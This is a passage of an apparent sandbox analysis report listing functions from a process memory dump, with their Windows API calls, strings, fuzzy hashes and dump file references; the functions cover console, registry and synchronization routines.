                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019E29B
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0019E2A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1013686580-0
                                                                                                                                                                                                                          • Opcode ID: 473623ee459ffcb10241cdd78f4a17cb723fc6bcbca799779dd849be91ac922a
                                                                                                                                                                                                                          • Instruction ID: 2dee8803a6dcc5c1e2212770ec5066ebfe68f6c966f5af529b2a78b7ef20587a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473623ee459ffcb10241cdd78f4a17cb723fc6bcbca799779dd849be91ac922a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B110635206600AFD728A764FC4EF563B95EF0B761F310416F106969E0CB71D880CA21
                                                                                                                                                                                                                          Function 001B8550 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001B8571
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 001B857E
                                                                                                                                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 001B85C7
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 001B85D5
                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 001B85DC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3008996577-0
                                                                                                                                                                                                                          • Opcode ID: 3734cf0d82e39d1b4ea159805783b6a6ef5cdb82c6c7614d7f8e96e05518f449
                                                                                                                                                                                                                          • Instruction ID: dccdda34b52f4371023de2b09ba7494a6af18f33c0adc8c669a646b62f339ea2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3734cf0d82e39d1b4ea159805783b6a6ef5cdb82c6c7614d7f8e96e05518f449
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36110735A112099ACB14EFF49C05AEEB7B8AF0D710F10411AF515E7690EB349A44CB6A
                                                                                                                                                                                                                          Function 001A70F5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 001A7122
                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001A7131
                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001A713A
                                                                                                                                                                                                                          • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 001A7143
                                                                                                                                                                                                                          • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 001A7158
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1445889803-0
                                                                                                                                                                                                                          • Opcode ID: b7a186749674c2890574ee59ab5764bfef91b632940814de0fe5f3e2fa421271
                                                                                                                                                                                                                          • Instruction ID: 0ed0432da1cb99d2a086f2efcdcebbbe0fe55fa3c0c43d4ccbd5ae49b767aafb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7a186749674c2890574ee59ab5764bfef91b632940814de0fe5f3e2fa421271
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97110A75E06208ABCF10DFB9D94869EB7F5FF58315F910966E401E7250E7309B408B41
                                                                                                                                                                                                                          Function 001B4840 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,001A87E5,00000000,?,00194A0A), ref: 001B484A
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,001A87E5,00000000,?,00194A0A), ref: 001B4879
                                                                                                                                                                                                                          • _getch.MSVCRT ref: 001B487F
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,001A87E5,00000000,?,00194A0A), ref: 001B4897
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,001A87E5,00000000,?,00194A0A), ref: 001B48AD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 491502236-0
                                                                                                                                                                                                                          • Opcode ID: 3b19f9bf7979766e871361b2dfb91cf4b471382eacbd8b0cf5eedc68d9d370e6
                                                                                                                                                                                                                          • Instruction ID: 26a2cfd820870ffad52d7d6a5dbb6060b2ba3dbbde3a830f311c43382f7e3776
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b19f9bf7979766e871361b2dfb91cf4b471382eacbd8b0cf5eedc68d9d370e6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1201D431102350FFEB14ABE1AC0AFAF3B65DF01720F104119F805965E2DBB18980CA55
                                                                                                                                                                                                                          Function 00196488 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00196513: memset.MSVCRT ref: 00196593
                                                                                                                                                                                                                            • Part of subcall function 0019DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00198E86,00198E5A,00000000), ref: 0019DC98
                                                                                                                                                                                                                            • Part of subcall function 0019DC60: RtlFreeHeap.NTDLL(00000000), ref: 0019DC9F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001AA097
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heapmemset$FreeProcess
                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                          • API String ID: 1291122668-438819550
                                                                                                                                                                                                                          • Opcode ID: d7f3643de6e3a9270e10eadc4abb6dd28a3134739eb00a6bfaecd38be3fc7675
                                                                                                                                                                                                                          • Instruction ID: 90a04929ec1ee308e6fe34ed17f0141cfd745e26fbfeea0cf5e216082eeddbeb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7f3643de6e3a9270e10eadc4abb6dd28a3134739eb00a6bfaecd38be3fc7675
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FB1F175D00209AFDF24EFA4C981BAEBBB1FF6A300F554069E805AB245D731ED41CB91
                                                                                                                                                                                                                          Function 001B5948 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 252registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001B5997
                                                                                                                                                                                                                            • Part of subcall function 0019AB7F: iswspace.MSVCRT ref: 0019AB8D
                                                                                                                                                                                                                            • Part of subcall function 0019AB7F: wcschr.MSVCRT ref: 0019AB9E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Enumiswspacewcschr
                                                                                                                                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                          • API String ID: 3493821229-3301834661
                                                                                                                                                                                                                          • Opcode ID: 99e0e96f912236e1dc4d2c58fa7de6b0d6a321a6310ad411e3a5f72da52d43ff
                                                                                                                                                                                                                          • Instruction ID: 62f78bcfa147d01ab3be23e1f10c4c5f94204e73716c87283230ce38afcb2a94
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99e0e96f912236e1dc4d2c58fa7de6b0d6a321a6310ad411e3a5f72da52d43ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F812D75E006195BDF28AB28CCD5BFA737BEF94704F2441A9E40AA7181EB709E81CB50
                                                                                                                                                                                                                          Function 0019CCD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                                                                                                                                                                          • API String ID: 0-1704545398
                                                                                                                                                                                                                          • Opcode ID: ff3e3d64b730b657032329675c1c6eae824e9b31501c2474b433dcec4442b216
                                                                                                                                                                                                                          • Instruction ID: 78171bb8b8ac7ddd1f5d3c14f6e250c2e9227ad3f17d6523986d5fa1630977e4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3e3d64b730b657032329675c1c6eae824e9b31501c2474b433dcec4442b216
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C517D31A0410187DF28BBA8E80577A7FE2FBA1354F55443AE48797A91EBB1DC80C7E1
                                                                                                                                                                                                                          Function 001B4DBD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: iswdigit$wcstol
                                                                                                                                                                                                                          • String ID: aApP
                                                                                                                                                                                                                          • API String ID: 644763121-2547155087
                                                                                                                                                                                                                          • Opcode ID: 90da7acca15ef581b6c33cce82d99cec6744f539461eaa9a7a82481b48f81fb1
                                                                                                                                                                                                                          • Instruction ID: cfe326cfa5171a33f8165e3bd914167db064e2a7bfcfac97693838c3ef35563e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90da7acca15ef581b6c33cce82d99cec6744f539461eaa9a7a82481b48f81fb1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B341D87560012287CF28DF69C8955FFB3B5BF55300B59842AED46DB282EB38DD42C6A1
                                                                                                                                                                                                                          Function 001B57A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001B57F8
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001B5886
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumErrorLast
                                                                                                                                                                                                                          • String ID: %s=%s$.
                                                                                                                                                                                                                          • API String ID: 1967352920-4275322459
                                                                                                                                                                                                                          • Opcode ID: 47e539c0af4477a45550d190be8edf13a2d3a274878f495cfc1001c30e193bb9
                                                                                                                                                                                                                          • Instruction ID: 7f14f8adcc5ae84fa75d355957d088fb4c54a46f282bfa92b1e04b332312f2a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47e539c0af4477a45550d190be8edf13a2d3a274878f495cfc1001c30e193bb9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61411575E0061997CF34AB2A8C95BFB73BAEFA4314F1445ADE80A97241DBB04E41CA90
                                                                                                                                                                                                                          Function 001BA759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BA79F
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 001BA83C
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?), ref: 001BA8B5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                          • String ID: %5lu
                                                                                                                                                                                                                          • API String ID: 2448137811-2100233843
                                                                                                                                                                                                                          • Opcode ID: ca0012de3773db6fe2a04ca0dce271f12dd80b567b5475bd3991a4925a5b137c
                                                                                                                                                                                                                          • Instruction ID: 55aa03215d67564790a243eaddefa4ecdabbb640711a5559b643f888d8846407
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca0012de3773db6fe2a04ca0dce271f12dd80b567b5475bd3991a4925a5b137c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1941B471A00219ABDF14EBA4DCD6BEEB7B8FF18304F4440A9E505A7241EB749F84CB91
                                                                                                                                                                                                                          Function 001B378A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 001B3835
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B3847
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastOpenSemaphore
                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                          • API String ID: 1909229842-1814513734
                                                                                                                                                                                                                          • Opcode ID: 942c942df415c4c60154bd56f62ec0fa5c11c900c03e157a79afc1988a089972
                                                                                                                                                                                                                          • Instruction ID: 3581b8134a7f127594bb94c12aa7d040f9f435e027eac74157eaa15da4c850f2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 942c942df415c4c60154bd56f62ec0fa5c11c900c03e157a79afc1988a089972
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE4117B1E012298BCB25DF29C8586E9B7B5EF94300F1483A9F81AD7250DB70CF45CB91
                                                                                                                                                                                                                          Function 001B237E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 001B239F
                                                                                                                                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 001B23CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateCurrentMutexProcess
                                                                                                                                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil
                                                                                                                                                                                                                          • API String ID: 3937467467-2303653343
                                                                                                                                                                                                                          • Opcode ID: 816f42266d2eb2cba7bb26f6b2f3e013853353c004e775c88f11e354e8e365a2
                                                                                                                                                                                                                          • Instruction ID: 0598122a00e8107e62851414c0a9c9917f597db7e31bdd5b42619873081ae591
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 816f42266d2eb2cba7bb26f6b2f3e013853353c004e775c88f11e354e8e365a2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA411675A402289BCB21EF64DC88EEAB7B5EF94700F1102C5E819A7240DB709F49CF90
                                                                                                                                                                                                                          Function 001B5679 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,001BCD40,0000001C,001B6901), ref: 001B56A8
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 001B5778
                                                                                                                                                                                                                            • Part of subcall function 001B64DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B650F
                                                                                                                                                                                                                            • Part of subcall function 001B64DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00), ref: 001B6545
                                                                                                                                                                                                                            • Part of subcall function 001B64DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B6553
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
